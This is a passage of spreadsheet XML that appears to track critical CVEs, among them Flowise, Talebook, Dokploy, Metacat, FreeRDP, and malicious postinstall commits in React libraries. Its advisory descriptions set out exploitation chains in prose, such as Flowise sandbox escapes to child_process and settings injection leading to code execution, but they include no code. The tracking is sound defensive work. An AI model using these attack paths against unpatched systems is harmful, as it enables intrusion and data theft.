          <t>MyBooks is an enhanced and easy-to-use personal ebook management web server also known as Talebook. In 3.41.2 and earlier, the AdminSettings.post handler in webserver/handlers/admin.py accepts SOCIAL_AUTH key names without validating quotes or newline characters, and SettingsLoader.dumpfile in webserver/loader.py concatenates those names into the generated Python source file auto.py without escaping them. An administrator can submit a crafted SOCIAL_AUTH key name that closes the settings dictionary and injects arbitrary Python statements. The application later executes those statements because SettingsLoader.loadfile imports auto.py as a module, and setting autoreload to true invokes restart_async so a process supervisor restarts the service and triggers the import. Successful exploitation executes commands with the privileges of the application service account and can disclose data, modify files, establish persistence, or disrupt the service. Related authorization and registration vulnerabilities can reduce the effective privilege requirement in a chained attack, but the standalone vulnerability requires administrator access. This issue is fixed in version 3.42.0.</t>
        </is>
      </c>
      <c r="M126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45272</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67305</t>
        </is>
      </c>
      <c r="C127" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E127" s="5" t="inlineStr"/>
      <c r="F127" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G127" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H127" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I127" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L127" s="5" t="inlineStr">
        <is>
          <t>FreeRDP Windows client before 3.29.0 contains a heap buffer overflow vulnerability in the clipboard virtual channel when processing CLIPRDR_FILE_CONTENTS_RESPONSE PDUs without validating the server-provided size against the destination buffer. A malicious RDP server can send a response with a data payload significantly larger than requested, causing arbitrary heap memory corruption that may enable remote code execution when a user performs a paste operation.</t>
        </is>
      </c>
      <c r="M127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67305</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69254</t>
        </is>
      </c>
      <c r="C128" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E128" s="5" t="inlineStr"/>
      <c r="F128" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G128" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, executeJavaScriptCode() accepted caller-provided nodeVMOptions and merged them over the default NodeVM security settings in packages/components/src/utils.ts. An authenticated attacker reaching packages/server/src/routes/node-custom-functions/index.ts could run a custom function that imported flowise-components/dist/src/utils.js, called executeJavaScriptCode() again with nodeVMOptions.require.builtin set to allow all built-in modules, and then required child_process to execute arbitrary system commands as root on the Flowise server. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69254</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69256</t>
        </is>
      </c>
      <c r="C129" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E129" s="5" t="inlineStr"/>
      <c r="F129" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G129" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent node allowed users to provide Python code that is executed through pyodide; although a denylist blocked dangerous Python constructs, pandas.read_pickle() could deserialize a pickled payload and achieve code execution without matching the denied words. The affected file is flowise-components/nodes/agents/CSVAgent/CSVAgent.ts, where user-supplied customReadCSVFunc is evaluated as pd.${customReadCSVFunc}. An authenticated user who can create or modify a chatflow can add a CSV Agent, place a malicious read_pickle payload in the Additional Parameters, save the chatflow, and trigger /api/v1/prediction/&lt;UUID&gt; to execute commands. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69256</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69259</t>
        </is>
      </c>
      <c r="C130" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E130" s="5" t="inlineStr"/>
      <c r="F130" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G130" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L130" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the SQLite Record Manager node in packages/components/nodes/recordmanager/SQLiteRecordManager/SQLiteRecordManager.ts accepted user-controlled additionalConfig and spread it after the intended database setting, allowing additionalConfig.database to overwrite the SQLite database path. An authenticated attacker using the published Docker image, which ran as root, could write a SQLite database to paths such as /etc/chromium/exploit.conf; by controlling the table name and namespace value, the attacker could place shell syntax into the database file and trigger execution when Puppeteer launched Chromium and sourced /etc/chromium/*.conf. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69259</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69264</t>
        </is>
      </c>
      <c r="C131" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E131" s="5" t="inlineStr"/>
      <c r="F131" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G131" s="5" t="inlineStr">
        <is>
          <t>java, node.js, python</t>
        </is>
      </c>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr">
        <is>
          <t>Prior to 3.1.3, Flowise CSVAgent interpolates an attacker-controlled segment of the csvFile data URI directly into a Python source-code template that is then executed by Pyodide. Because Pyodide is loaded with the default js bridge to globalThis, which on Node.js exposes eval and dynamic import, the attacker can break out of the Python string literal, hand a JavaScript string to js.eval, dynamically import Node built-in modules such as fs and child_process, and execute arbitrary file I/O or OS commands as the Flowise process. The two validator paths around this code, validatePythonCodeForDataFrame and validateCustomReadCSVFunction, are never applied to the bootstrap template. A workspace user with chatflows:create or agentflows/chatflows update permission can plant a CSV Agent node with a crafted csvFile; once the chatflow is exposed via POST /api/v1/prediction/:id, any unauthenticated request triggers host remote code execution. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69264</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72879</t>
        </is>
      </c>
      <c r="C132" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E132" s="5" t="inlineStr"/>
      <c r="F132" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G132" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.8, the getRegistryCommands() function in packages/server/src/utils/cluster/upload.ts interpolates registry.password and registry.registryUrl directly into a shell command without escaping. An authenticated user with project access can configure malicious registry credentials and trigger a swarm deployment to execute arbitrary OS commands on the Dokploy server, read or modify host files, and access other containers through Docker. This issue is fixed in version 0.29.8.</t>
        </is>
      </c>
      <c r="M132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72879</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="C133" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E133" s="5" t="inlineStr"/>
      <c r="F133" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G133" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr">
        <is>
          <t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t>
        </is>
      </c>
      <c r="M133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14813</t>
        </is>
      </c>
      <c r="C134" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E134" s="5" t="inlineStr"/>
      <c r="F134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G134" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr">
        <is>
          <t>: Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (core modules).
 This vulnerability is associated with program files G3413CTRBlockCipher.
This issue affects BC-JAVA: from 1.59 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14813</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15378</t>
        </is>
      </c>
      <c r="C135" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E135" s="5" t="inlineStr"/>
      <c r="F135" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G135" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr">
        <is>
          <t>2026-07-10</t>
        </is>
      </c>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L135" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `guardrails-detectors` component. This vulnerability allows a remote attacker to perform a blind Server-Side Request Forgery (SSRF) by submitting a specially crafted XML Schema Definition (XSD) string. This can lead to unauthorized access to sensitive information, including credentials from cloud metadata services, Kubernetes API, internal MinIO, and other internal network endpoints. Additionally, it enables local file reads of critical data such as service account tokens and pod secrets.</t>
        </is>
      </c>
      <c r="M135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15378</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44990</t>
        </is>
      </c>
      <c r="C136" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E136" s="5" t="inlineStr"/>
      <c r="F136" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G136" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L136" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: 'discard'` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue.</t>
        </is>
      </c>
      <c r="M136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44990</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45118</t>
        </is>
      </c>
      <c r="C137" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E137" s="5" t="inlineStr"/>
      <c r="F137" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G137" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr">
        <is>
          <t>CWE-83</t>
        </is>
      </c>
      <c r="L137" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Contact module does not validate a redirect URL or protocol correctly, resulting in an open redirect and reflected JavaScript code injection. contact.php accepts the redirect target from the from HTTP parameter in $mybb-&gt;input['from'] or the Referer HTTP header in $_SERVER['HTTP_REFERER'] and passes it to redirect() without sufficient verification. A javascript: URI becomes the target of the `Click here if you don't want to wait any longer` link because $force_redirect is true, allowing script execution when a victim selects the link. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45118</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47754</t>
        </is>
      </c>
      <c r="C138" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E138" s="5" t="inlineStr"/>
      <c r="F138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G138" s="5" t="inlineStr">
        <is>
          <t>java, tomcat</t>
        </is>
      </c>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-862</t>
        </is>
      </c>
      <c r="L138" s="5" t="inlineStr">
        <is>
          <t>Metacat is data repository software that helps researchers preserve, share, and discover data. Versions 2.x through 2.19.1 and all 1.x versions contain an unauthenticated path traversal in the `archiveEntryName` parameter of the `action=read` endpoint that is part of the original 1.x Metacat API. `ArchiveHandler.readArchiveEntry()` concatenates the user-supplied parameter into a filesystem path without validation, and the surrounding `hasReadPermission()` check is commented out. An unauthenticated remote attacker can read any file accessible to the Tomcat process by sending a single GET request. Proof-of-concept exploits have been demonstrated and verified against this vulnerability, and it should be considered easily exploitable for any Metacat deployment &lt; 3.0.0 by any user with access to the 1.x API. Through this vulnerability, production 2.x deployments are exposed to credential theft, client certificate and private key exfiltration enabling member node impersonation within the federation, embargoed research data disclosure, and broad system reconnaissance. Given Metacat's deployment footprint across the DataONE network of repositories and federally funded research programs, the population of exposed 2.x instances is non-trivial. The vulnerability was eliminated in Metacat version 3.0.0 and after by eliminating the entire Metacat 1.x API that exposed this vulnerability. The vulnerability was remediated in April 2024 with the release of Metacat 3.0.0, which removed the legacy Metacat API including ArchiveHandler.java. The commit message and issue reference architectural cleanup, not a security fix, and no advisory or CVE was issued. The 2.x branch was not and will not be backported, as is standard practice in Metacat, which only supports the most current release. 2.19.1 remains vulnerable with identical code and is beyond its supported lifetime. As a workaround, disable or restrict 1.x API servlets. Because the vulnerable 1.x API is no longer used or necessary in most Metacat deployments, restricting access to the old API endpoints can reduce or eliminate exposure for 2.19.x deployments.  After removing those features, restart Tomcat or whichever software is hosting the servlets.</t>
        </is>
      </c>
      <c r="M138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47754</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48063</t>
        </is>
      </c>
      <c r="C139" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E139" s="5" t="inlineStr"/>
      <c r="F139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G139" s="5" t="inlineStr">
        <is>
          <t>java, sap</t>
        </is>
      </c>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L139" s="5" t="inlineStr">
        <is>
          <t>Baileys is a cocket-based TS/JavaScript API for WhatsApp Web. In versions prior to both 6.7.22 and 7.0.0-rc12, any Baileys session  can be sent a malicious payload via the placeholderResendMessage and trigger a fake messages.upsert event with a fake message key and payload. This allows anyone to spoof messages. The same exploit also allows an attacker to corrupt the app state sync system by sending fake key shares, and also allows for history sync spoofing which also serves the same problem, injecting fake previous context or "on-demand" sync. This issue has been fixed in versions 6.7.22 and 7.0.0-rc12.</t>
        </is>
      </c>
      <c r="M139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48063</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48158</t>
        </is>
      </c>
      <c r="C140" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E140" s="5" t="inlineStr"/>
      <c r="F140" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G140" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L140" s="5" t="inlineStr">
        <is>
          <t>use-context-selector is a React useContextSelector hook in userland Between 2026-05-18 15:57:18 and 2026-05-19 15:24:34, the default branch contained malicious commits 9d8481a513b7b0d1c0941b220c69b25de748641b through 6f2dae054ca014068bdbbb4db96006424d674124 that executed remote attacker-controlled code on developer machines during
`npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 15:57:18 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity** since 2026-05-18 15:57:18, and clean local clones.</t>
        </is>
      </c>
      <c r="M140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48158</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48159</t>
        </is>
      </c>
      <c r="C141" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E141" s="5" t="inlineStr"/>
      <c r="F141" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G141" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L141" s="5" t="inlineStr">
        <is>
          <t>use-reducer-async is a React useReducer with async actions. Between 2026-05-18 16:29:52 and 2026-05-19 15:26:07, the default branch contained malicious commits da72edbde5705efcec6c62e0a3dcb73687b78dc8 through df07d5711458d8b46e11dd7afaaa21e88cafabfb that executed remote attacker-controlled code on developer machines during `npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 16:29:52 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity since 2026-05-18 16:29:52, and clean local clones.</t>
        </is>
      </c>
      <c r="M141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48159</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48160</t>
        </is>
      </c>
      <c r="C142" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E142" s="5" t="inlineStr"/>
      <c r="F142" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G142" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>react-tracked provides state usage tracking with Proxies. Between 2026-05-18 19:26:36 and 2026-05-19 15:22:45, the default branch contained malicious commits 6978272a7d6ca02225cb747ea69f427512e33699 through 949f1a3d6bb1ff7d1a0dec892afd773e742627e8 that executed remote attacker-controlled code on developer machines during `npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 19:26:36 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity** since 2026-05-18 19:26:36, and clean local clones.</t>
        </is>
      </c>
      <c r="M142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48160</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48996</t>
        </is>
      </c>
      <c r="C143" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E143" s="5" t="inlineStr"/>
      <c r="F143" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G143" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr">
        <is>
